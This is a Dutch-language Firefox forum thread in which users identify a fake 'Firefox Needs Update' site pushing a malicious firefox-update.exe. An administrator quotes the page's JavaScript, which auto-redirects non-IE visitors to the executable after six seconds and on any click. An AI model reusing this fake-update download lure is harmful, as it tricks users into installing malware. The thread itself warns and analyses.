Firefox virus voor windows gebruikers??

Mozilla Firefox is de webbrowser van Mozilla. Volg in geval van problemen eerst onze standaard diagnose.
Plaats reactie
FransD
Berichten: 1
Lid geworden op: 29 september 2010, 13:07
    Macintosh Firefox

Firefox virus voor windows gebruikers??

Bericht door FransD »

today my FF browser took me to a website (adres below) telling me that my version is outdated and that I should update my version. A pop-up screen told me to open a .exe file. Since I'm an apple fan it doesn't bother me much but window users could encounter problems.

can someone please inform me if this is a legit Mozilla site or a site that distributes a virus. If it's a legit mozilla site then please remove this subject. If not please inform others.

See enclosed screen print

hxxp ://newff.co.cc/ don't click on it unless you know what you r doing

(moderator edit: ik heb maar even een spatie in het adres geplaatst om te voorkomen dat iemand er zomaar op klikt)
Bijlagen
Firefox Schermafbeelding 2010-09-29 om 14.14.39.jpg
Firefox Schermafbeelding 2010-09-29 om 14.14.39.jpg (164.72 KiB) 1707 keer bekeken
corvl
Berichten: 944
Lid geworden op: 7 mei 2009, 1:21
    Linux Firefox

Re: Firefox virus voor windows gebruikers??

Bericht door corvl »

Niet downloaden van die site.
Dat geeft alleen maar een virus infectie.
Een site die een cc (Cocos Islands) country code heeft wekt ook niet veel vertrouwen.

Je moet alleen Firefox downloaden van de officiële Mozilla site and nooit van sites die zomaar als een pop-up verschijnen.
Deze site is al vaker genoemd als een 'verleider' om malware the installeren.
Als je alle links controleert zul je zien dat ze allemaal hetzelfde doen.

https://support.mozilla.com/en-US/questions/755156
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Firefox virus voor windows gebruikers??

Bericht door nirwana »

Dat is wel een heel geniepige manier. Wel vind ik het vreemd dat deze download niet door de blacklist van Google geblokkeerd wordt.
Of zou deze site daar toen nog niet op hebben gestaan ?
Of zou deze blacklist alleen werken voor webpagina's en niet voor bestanden die gedownload worden ?

Als ik de code van deze website bekijk, dan heeft men hier het volgende aan toegevoegd:

Code: Selecteer alles

<script language="javascript">
var olo = "firefox-update.exe";
</script>
<html xml:lang="en-US" lang="en-US" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Firefox Needs Update</title>
<script>
function bePDquXU()
{
  if(window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) 
  {
    return;
  }
  else 
  {
    window.setTimeout("location.href=olo", 6000);
 }
}
-->
</script>
Verderop in de pagina staat dan nog een aanroep van deze bePDquXU-functie:

Code: Selecteer alles

<div id="wrapper"  style="cursor:pointer;" onClick="document.location.href=olo">
<script>
<!--
     bePDquXU();
-->
</script>
Als je zoekt op het magische woord olo dan kom je de diverse aanpassingen wel tegen.

Wat mij betreft klaagt Mozilla ze aan voor het schaamteloos kopiëren van de Mozilla-layout en het oneigenlijk gebruiken van Mozilla's merkrechten. Ik hoop dan alleen dat Mozilla's rechten ook in de voormalige Sovjet-Unie (want dit komt ergens uit die contreien) kunnen worden uitgevoerd.
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Dorus
Berichten: 2547
Lid geworden op: 9 oktober 2004, 12:11
    Windows Vista Firefox

Re: Firefox virus voor windows gebruikers??

Bericht door Dorus »

nirwana schreef:Dat is wel een heel geniepige manier. Wel vind ik het vreemd dat deze download niet door de blacklist van Google geblokkeerd wordt.
Of zou deze site daar toen nog niet op hebben gestaan ?
Of zou deze blacklist alleen werken voor webpagina's en niet voor bestanden die gedownload worden ?
Als je hem in die blaclist wilt moet je hem wel zelf melden he :)

Kasparasky sloeg wel meteen alarm op die site, dat is voor het eerst trouwens. Heb hem ook meteen aan WoT gemeld, die vond hem ook nog goed.
¿ʇı̣ əsnqɐ ʇ,uɐɔ noʎ ɟı̣ əpoɔı̣un sı̣ pooɓ ʇɐɥʍ
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Firefox virus voor windows gebruikers??

Bericht door nirwana »

Dorus schreef:Als je hem in die blacklist wilt moet je hem wel zelf melden he :)
Ik ga er doorgaans van uit dat ik niet de eerste ben die achter zoiets komt. Het nieuws bereikt mij doorgaans niet als eerste. Overigens heb ik bijvoorbeeld wel eens bij Mozilla een bug aangemeld. Vervolgens blijkt doorgaans dat dit al een duplicate is en allang aangemeld is. Dat weerhoudt mij er overigens niet van om een bug aan te melden als ik dat nodig vind. Wel probeer ik altijd eerst goed te zoeken of het niet al eerder is aangemeld. Maar hoe goed je ook zoekt, iets vinden in Bugzilla vind ik nog altijd een opgave. Gelukkig zijn er mensen die daar beter de weg weten.
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Dorus
Berichten: 2547
Lid geworden op: 9 oktober 2004, 12:11
    Windows Vista Firefox

Re: Firefox virus voor windows gebruikers??

Bericht door Dorus »

Ik heb een stuk of 10 bugs in bugzilla op mijn naam staan, op 1 na ofzo waren het allemaal duplicates (ook al had ik zelf uitgebreid gezocht).

Echter zorgde mijn duplicate in de helft van de gevallen er wel voor dat er meer informatie over het probleem bekend werd, wat uiteindelijk helpt bij het oplossen ervan.
¿ʇı̣ əsnqɐ ʇ,uɐɔ noʎ ɟı̣ əpoɔı̣un sı̣ pooɓ ʇɐɥʍ
Gebruikersavatar
nirwana
Beheerder
Berichten: 11528
Lid geworden op: 19 september 2003, 5:09
    Windows 7 Firefox
Contacteer:

Re: Firefox virus voor windows gebruikers??

Bericht door nirwana »

Dorus schreef:Ik heb een stuk of 10 bugs in bugzilla op mijn naam staan, op 1 na ofzo waren het allemaal duplicates (ook al had ik zelf uitgebreid gezocht).
Ben ik gelukkig niet de enige.
Dit was de laatste bug die ik heb aangemaakt: https://bugzilla.mozilla.org/show_bug.cgi?id=566048

De eerste reactie erop was bemoedigend: "Great find. I was totally unaware of this and it's not something I've seen before."
Maar nog geen dag later bleek het toch een duplicate te zijn: https://bugzilla.mozilla.org/show_bug.cgi?id=534178
Inmiddels heeft die de status Resolved Fixed, dus ik verwacht dat het in Firefox 4 wel zal zijn opgelost.
Wie weet kunnen we dan op MozBrowser ook standaard een plugin-check aanbieden.
Met vriendelijke groet,

Martijn
[ Mede-oprichter + webmaster MozBrowser | beheerder Startpagina's over freeware, GIMP, Mozilla en OpenOffice.org / LibreOffice, Ubuntu
Plaats reactie